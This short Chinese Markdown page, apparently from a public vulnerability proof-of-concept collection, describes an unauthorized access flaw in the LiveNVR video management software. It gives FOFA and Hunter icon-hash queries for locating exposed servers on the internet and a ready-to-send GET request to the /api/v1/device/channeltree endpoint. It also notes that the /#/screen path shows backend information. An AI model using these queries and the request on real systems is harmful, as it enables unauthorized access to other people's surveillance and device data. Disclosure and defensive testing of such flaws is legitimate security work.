32 lines
680 B
Markdown
32 lines
680 B
Markdown
|
|
# LiveNVR流媒体服务软件接口存在未授权访问漏洞
|
||
|
|
|
||
|
|
livenvr 青柿视频管理系统 channeltree 存在未授权访问漏洞。
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
icon_hash="-206100324"
|
||
|
|
```
|
||
|
|
|
||
|
|
## hunter
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
web.icon=="7bfff01de80c14288ff385cd7db83c56"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1
|
||
|
|
Host:
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
接口访问` /#/screen ` 可以看到后台信息了
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
## 漏洞来源
|
||
|
|
|
||
|
|
- https://mp.weixin.qq.com/s/whXXvwzZpfj19B7unFCrjg
|